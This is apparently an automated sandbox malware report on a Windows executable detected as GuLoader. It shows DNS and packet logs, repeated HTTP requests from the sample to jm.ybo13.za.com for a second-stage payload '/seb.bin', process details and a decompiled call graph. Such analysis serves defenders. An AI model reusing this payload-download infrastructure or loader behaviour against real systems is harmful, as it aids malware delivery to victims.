                                      Nov 5, 2024 16:15:13.564832926 CET4971780192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:13.565077066 CET4971780192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:13.566235065 CET804971745.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:13.566279888 CET4971780192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:13.571199894 CET804971745.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:23.571075916 CET4971880192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:23.576025009 CET804971845.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:23.576122999 CET4971880192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:23.576354980 CET4971880192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:23.581134081 CET804971845.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:24.172930002 CET804971845.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:24.173234940 CET4971880192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:24.173373938 CET4971880192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:24.178359032 CET804971845.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:24.178428888 CET4971880192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:24.180767059 CET804971845.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:34.180254936 CET4971980192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:34.185170889 CET804971945.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:34.185297012 CET4971980192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:34.185461998 CET4971980192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:34.190442085 CET804971945.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:34.802369118 CET804971945.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:34.802465916 CET4971980192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:34.802726030 CET4971980192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:34.804194927 CET804971945.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:34.804265022 CET4971980192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:34.808070898 CET804971945.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:44.833724976 CET4972080192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:44.838620901 CET804972045.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:44.838985920 CET4972080192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:44.839181900 CET4972080192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:44.844172955 CET804972045.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:45.435466051 CET804972045.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:45.435578108 CET4972080192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:45.435724020 CET4972080192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:45.437103987 CET804972045.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:45.437179089 CET4972080192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:45.440435886 CET804972045.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:55.477637053 CET4972180192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:55.483606100 CET804972145.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:55.483675003 CET4972180192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:55.484808922 CET4972180192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:55.492274046 CET804972145.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:56.075310946 CET804972145.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:56.075437069 CET4972180192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:56.075566053 CET4972180192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:56.077133894 CET804972145.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:56.077192068 CET4972180192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:56.080387115 CET804972145.33.20.235192.168.2.8
                                      Nov 5, 2024 16:16:06.090290070 CET4972280192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:06.095244884 CET804972245.33.20.235192.168.2.8
                                      Nov 5, 2024 16:16:06.095432043 CET4972280192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:06.096429110 CET4972280192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:06.101361036 CET804972245.33.20.235192.168.2.8
                                      Nov 5, 2024 16:16:06.684643984 CET804972245.33.20.235192.168.2.8
                                      Nov 5, 2024 16:16:06.684758902 CET4972280192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:06.685009956 CET4972280192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:06.685761929 CET804972245.33.20.235192.168.2.8
                                      Nov 5, 2024 16:16:06.685812950 CET4972280192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:06.689992905 CET804972245.33.20.235192.168.2.8
                                      Nov 5, 2024 16:16:16.698872089 CET4972380192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:16.703926086 CET804972345.33.20.235192.168.2.8
                                      Nov 5, 2024 16:16:16.704003096 CET4972380192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:16.704794884 CET4972380192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:16.709667921 CET804972345.33.20.235192.168.2.8
                                      Nov 5, 2024 16:16:17.305033922 CET804972345.33.20.235192.168.2.8
                                      Nov 5, 2024 16:16:17.305113077 CET4972380192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:17.311438084 CET804972345.33.20.235192.168.2.8
                                      Nov 5, 2024 16:16:17.311537981 CET4972380192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:17.372359037 CET4972380192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:17.377294064 CET804972345.33.20.235192.168.2.8
                                      Nov 5, 2024 16:16:27.384116888 CET4972480192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:27.391120911 CET804972445.33.20.235192.168.2.8
                                      Nov 5, 2024 16:16:27.391268015 CET4972480192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:27.391520977 CET4972480192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:27.398662090 CET804972445.33.20.235192.168.2.8
                                      Nov 5, 2024 16:16:27.980731010 CET804972445.33.20.235192.168.2.8
                                      Nov 5, 2024 16:16:27.980874062 CET4972480192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:27.981014967 CET4972480192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:27.981849909 CET804972445.33.20.235192.168.2.8
                                      Nov 5, 2024 16:16:27.981910944 CET4972480192.168.2.845.33.20.235
                                      Nov 5, 2024 16:16:27.985851049 CET804972445.33.20.235192.168.2.8
                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 5, 2024 16:13:46.252650976 CET5017253192.168.2.81.1.1.1
                                      Nov 5, 2024 16:13:46.953506947 CET53501721.1.1.1192.168.2.8
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Nov 5, 2024 16:13:46.252650976 CET192.168.2.81.1.1.10x8321Standard query (0)jm.ybo13.za.comA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Nov 5, 2024 16:13:46.953506947 CET1.1.1.1192.168.2.80x8321No error (0)jm.ybo13.za.com45.33.20.235A (IP address)IN (0x0001)false
                                      Nov 5, 2024 16:13:46.953506947 CET1.1.1.1192.168.2.80x8321No error (0)jm.ybo13.za.com96.126.123.244A (IP address)IN (0x0001)false
                                      Nov 5, 2024 16:13:46.953506947 CET1.1.1.1192.168.2.80x8321No error (0)jm.ybo13.za.com72.14.185.43A (IP address)IN (0x0001)false
                                      Nov 5, 2024 16:13:46.953506947 CET1.1.1.1192.168.2.80x8321No error (0)jm.ybo13.za.com45.33.2.79A (IP address)IN (0x0001)false
                                      Nov 5, 2024 16:13:46.953506947 CET1.1.1.1192.168.2.80x8321No error (0)jm.ybo13.za.com45.33.18.44A (IP address)IN (0x0001)false
                                      Nov 5, 2024 16:13:46.953506947 CET1.1.1.1192.168.2.80x8321No error (0)jm.ybo13.za.com45.79.19.196A (IP address)IN (0x0001)false
                                      Nov 5, 2024 16:13:46.953506947 CET1.1.1.1192.168.2.80x8321No error (0)jm.ybo13.za.com72.14.178.174A (IP address)IN (0x0001)false
                                      Nov 5, 2024 16:13:46.953506947 CET1.1.1.1192.168.2.80x8321No error (0)jm.ybo13.za.com45.33.23.183A (IP address)IN (0x0001)false
                                      Nov 5, 2024 16:13:46.953506947 CET1.1.1.1192.168.2.80x8321No error (0)jm.ybo13.za.com45.56.79.23A (IP address)IN (0x0001)false
                                      Nov 5, 2024 16:13:46.953506947 CET1.1.1.1192.168.2.80x8321No error (0)jm.ybo13.za.com173.255.194.134A (IP address)IN (0x0001)false
                                      Nov 5, 2024 16:13:46.953506947 CET1.1.1.1192.168.2.80x8321No error (0)jm.ybo13.za.com45.33.30.197A (IP address)IN (0x0001)false
                                      Nov 5, 2024 16:13:46.953506947 CET1.1.1.1192.168.2.80x8321No error (0)jm.ybo13.za.com198.58.118.167A (IP address)IN (0x0001)false
                                      • jm.ybo13.za.com
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.84970845.33.20.235808024C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 5, 2024 16:13:46.988059998 CET167OUTGET /seb.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: jm.ybo13.za.com
                                      Cache-Control: no-cache
                                      Nov 5, 2024 16:13:48.306051016 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:13:47 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:
                                      Nov 5, 2024 16:13:48.306562901 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:13:47 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:
                                      Nov 5, 2024 16:13:48.306689024 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:13:47 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.84970945.33.20.235808024C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 5, 2024 16:13:58.325544119 CET167OUTGET /seb.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: jm.ybo13.za.com
                                      Cache-Control: no-cache
                                      Nov 5, 2024 16:13:58.967118979 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:13:58 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.84971045.33.20.235808024C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 5, 2024 16:14:08.983772039 CET167OUTGET /seb.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: jm.ybo13.za.com
                                      Cache-Control: no-cache
                                      Nov 5, 2024 16:14:09.808445930 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:14:09 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.84971145.33.20.235808024C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 5, 2024 16:14:19.830996990 CET167OUTGET /seb.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: jm.ybo13.za.com
                                      Cache-Control: no-cache
                                      Nov 5, 2024 16:14:20.444678068 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:14:20 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.84971345.33.20.235808024C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 5, 2024 16:14:30.466727972 CET167OUTGET /seb.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: jm.ybo13.za.com
                                      Cache-Control: no-cache
                                      Nov 5, 2024 16:14:31.080193996 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:14:31 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.84971445.33.20.235808024C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 5, 2024 16:14:41.093044043 CET167OUTGET /seb.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: jm.ybo13.za.com
                                      Cache-Control: no-cache
                                      Nov 5, 2024 16:14:41.699768066 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:14:41 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.84971545.33.20.235808024C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 5, 2024 16:14:51.717046022 CET167OUTGET /seb.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: jm.ybo13.za.com
                                      Cache-Control: no-cache
                                      Nov 5, 2024 16:14:52.317378998 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:14:52 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.84971645.33.20.235808024C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 5, 2024 16:15:02.342324972 CET167OUTGET /seb.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: jm.ybo13.za.com
                                      Cache-Control: no-cache
                                      Nov 5, 2024 16:15:02.954221010 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:15:02 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.84971745.33.20.235808024C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 5, 2024 16:15:12.967488050 CET167OUTGET /seb.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: jm.ybo13.za.com
                                      Cache-Control: no-cache
                                      Nov 5, 2024 16:15:13.564771891 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:15:13 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.84971845.33.20.235808024C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 5, 2024 16:15:23.576354980 CET167OUTGET /seb.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: jm.ybo13.za.com
                                      Cache-Control: no-cache
                                      Nov 5, 2024 16:15:24.172930002 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:15:24 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.84971945.33.20.235808024C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 5, 2024 16:15:34.185461998 CET167OUTGET /seb.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: jm.ybo13.za.com
                                      Cache-Control: no-cache
                                      Nov 5, 2024 16:15:34.802369118 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:15:34 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.84972045.33.20.235808024C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 5, 2024 16:15:44.839181900 CET167OUTGET /seb.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: jm.ybo13.za.com
                                      Cache-Control: no-cache
                                      Nov 5, 2024 16:15:45.435466051 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:15:45 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.84972145.33.20.235808024C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 5, 2024 16:15:55.484808922 CET167OUTGET /seb.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: jm.ybo13.za.com
                                      Cache-Control: no-cache
                                      Nov 5, 2024 16:15:56.075310946 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:15:56 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.84972245.33.20.235808024C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 5, 2024 16:16:06.096429110 CET167OUTGET /seb.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: jm.ybo13.za.com
                                      Cache-Control: no-cache
                                      Nov 5, 2024 16:16:06.684643984 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:16:06 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.84972345.33.20.235808024C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 5, 2024 16:16:16.704794884 CET167OUTGET /seb.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: jm.ybo13.za.com
                                      Cache-Control: no-cache
                                      Nov 5, 2024 16:16:17.305033922 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:16:17 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.84972445.33.20.235808024C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 5, 2024 16:16:27.391520977 CET167OUTGET /seb.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: jm.ybo13.za.com
                                      Cache-Control: no-cache
                                      Nov 5, 2024 16:16:27.980731010 CET185INHTTP/1.1 403 Forbidden
                                      server: openresty/1.13.6.1
                                      date: Tue, 05 Nov 2024 15:16:27 GMT
                                      content-type: text/html
                                      content-length: 1
                                      x-fail-reason: Bad Extension
                                      connection: close
                                      Data Raw: 20
                                      Data Ascii:


                                      Click to jump to process

                                      Click to jump to process

                                      Click to jump to process

                                      Target ID:0
                                      Start time:10:13:26
                                      Start date:05/11/2024
                                      Path:C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\5WP9WCM8qV.exe"
                                      Imagebase:0x400000
                                      File size:538'129 bytes
                                      MD5 hash:649BA11FD51E50393B1CF0F461B90CBF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1526284301.0000000006145000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:10:13:36
                                      Start date:05/11/2024
                                      Path:C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\5WP9WCM8qV.exe"
                                      Imagebase:0x400000
                                      File size:538'129 bytes
                                      MD5 hash:649BA11FD51E50393B1CF0F461B90CBF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.3280318515.0000000003565000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:22.9%
                                        Dynamic/Decrypted Code Coverage:14%
                                        Signature Coverage:20.6%
                                        Total number of Nodes:1511
                                        Total number of Limit Nodes:44
                                        execution_graph 4795 402840 4796 402bbf 18 API calls 4795->4796 4798 40284e 4796->4798 4797 402864 4800 405c05 2 API calls 4797->4800 4798->4797 4799 402bbf 18 API calls 4798->4799 4799->4797 4801 40286a 4800->4801 4823 405c2a GetFileAttributesW CreateFileW 4801->4823 4803 402877 4804 402883 GlobalAlloc 4803->4804 4805 40291a 4803->4805 4808 402911 CloseHandle 4804->4808 4809 40289c 4804->4809 4806 402922 DeleteFileW 4805->4806 4807 402935 4805->4807 4806->4807 4808->4805 4824 403258 SetFilePointer 4809->4824 4811 4028a2 4812 403242 ReadFile 4811->4812 4813 4028ab GlobalAlloc 4812->4813 4814 4028bb 4813->4814 4815 4028ef 4813->4815 4816 403027 32 API calls 4814->4816 4817 405cdc WriteFile 4815->4817 4818 4028c8 4816->4818 4819 4028fb GlobalFree 4817->4819 4821 4028e6 GlobalFree 4818->4821 4820 403027 32 API calls 4819->4820 4822 40290e 4820->4822 4821->4815 4822->4808 4823->4803 4824->4811 4825 10001000 4828 1000101b 4825->4828 4835 10001516 4828->4835 4830 10001020 4831 10001024 4830->4831 4832 10001027 GlobalAlloc 4830->4832 4833 1000153d 3 API calls 4831->4833 4832->4831 4834 10001019 4833->4834 4837 1000151c 4835->4837 4836 10001522 4836->4830 4837->4836 4838 1000152e GlobalFree 4837->4838 4838->4830 4839 401cc0 4840 402ba2 18 API calls 4839->4840 4841 401cc7 4840->4841 4842 402ba2 18 API calls 4841->4842 4843 401ccf GetDlgItem 4842->4843 4844 402531 4843->4844 4845 4029c0 4846 402ba2 18 API calls 4845->4846 4847 4029c6 4846->4847 4848 4029f9 4847->4848 4850 40281e 4847->4850 4851 4029d4 4847->4851 4849 406077 18 API calls 4848->4849 4848->4850 4849->4850 4851->4850 4853 405f9c wsprintfW 4851->4853 4853->4850 4196 403c41 4197 403d94 4196->4197 4198 403c59 4196->4198 4200 403de5 4197->4200 4201 403da5 GetDlgItem GetDlgItem 4197->4201 4198->4197 4199 403c65 4198->4199 4203 403c70 SetWindowPos 4199->4203 4204 403c83 4199->4204 4202 403e3f 4200->4202 4210 401389 2 API calls 4200->4210 4205 404119 19 API calls 4201->4205 4206 404165 SendMessageW 4202->4206 4226 403d8f 4202->4226 4203->4204 4207 403ca0 4204->4207 4208 403c88 ShowWindow 4204->4208 4209 403dcf SetClassLongW 4205->4209 4238 403e51 4206->4238 4211 403cc2 4207->4211 4212 403ca8 DestroyWindow 4207->4212 4208->4207 4213 40140b 2 API calls 4209->4213 4214 403e17 4210->4214 4215 403cc7 SetWindowLongW 4211->4215 4216 403cd8 4211->4216 4265 4040a2 4212->4265 4213->4200 4214->4202 4219 403e1b SendMessageW 4214->4219 4215->4226 4217 403d81 4216->4217 4218 403ce4 GetDlgItem 4216->4218 4275 404180 4217->4275 4222 403d14 4218->4222 4223 403cf7 SendMessageW IsWindowEnabled 4218->4223 4219->4226 4220 40140b 2 API calls 4220->4238 4221 4040a4 DestroyWindow EndDialog 4221->4265 4228 403d21 4222->4228 4229 403d68 SendMessageW 4222->4229 4230 403d34 4222->4230 4240 403d19 4222->4240 4223->4222 4223->4226 4225 4040d3 ShowWindow 4225->4226 4227 406077 18 API calls 4227->4238 4228->4229 4228->4240 4229->4217 4233 403d51 4230->4233 4234 403d3c 4230->4234 4232 403d4f 4232->4217 4236 40140b 2 API calls 4233->4236 4237 40140b 2 API calls 4234->4237 4235 404119 19 API calls 4235->4238 4239 403d58 4236->4239 4237->4240 4238->4220 4238->4221 4238->4226 4238->4227 4238->4235 4256 403fe4 DestroyWindow 4238->4256 4266 404119 4238->4266 4239->4217 4239->4240 4272 4040f2 4240->4272 4242 403ecc GetDlgItem 4243 403ee1 4242->4243 4244 403ee9 ShowWindow KiUserCallbackDispatcher 4242->4244 4243->4244 4269 40413b KiUserCallbackDispatcher 4244->4269 4246 403f13 EnableWindow 4249 403f27 4246->4249 4247 403f2c GetSystemMenu EnableMenuItem SendMessageW 4248 403f5c SendMessageW 4247->4248 4247->4249 4248->4249 4249->4247 4270 40414e SendMessageW 4249->4270 4271 406055 lstrcpynW 4249->4271 4252 403f8a lstrlenW 4253 406077 18 API calls 4252->4253 4254 403fa0 SetWindowTextW 4253->4254 4255 401389 2 API calls 4254->4255 4255->4238 4257 403ffe CreateDialogParamW 4256->4257 4256->4265 4258 404031 4257->4258 4257->4265 4259 404119 19 API calls 4258->4259 4260 40403c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4259->4260 4261 401389 2 API calls 4260->4261 4262 404082 4261->4262 4262->4226 4263 40408a ShowWindow 4262->4263 4264 404165 SendMessageW 4263->4264 4264->4265 4265->4225 4265->4226 4267 406077 18 API calls 4266->4267 4268 404124 SetDlgItemTextW 4267->4268 4268->4242 4269->4246 4270->4249 4271->4252 4273 4040f9 4272->4273 4274 4040ff SendMessageW 4272->4274 4273->4274 4274->4232 4276 404198 GetWindowLongW 4275->4276 4286 404221 4275->4286 4277 4041a9 4276->4277 4276->4286 4278 4041b8 GetSysColor 4277->4278 4279 4041bb 4277->4279 4278->4279 4280 4041c1 SetTextColor 4279->4280 4281 4041cb SetBkMode 4279->4281 4280->4281 4282 4041e3 GetSysColor 4281->4282 4283 4041e9 4281->4283 4282->4283 4284 4041f0 SetBkColor 4283->4284 4285 4041fa 4283->4285 4284->4285 4285->4286 4287 404214 CreateBrushIndirect 4285->4287 4288 40420d DeleteObject 4285->4288 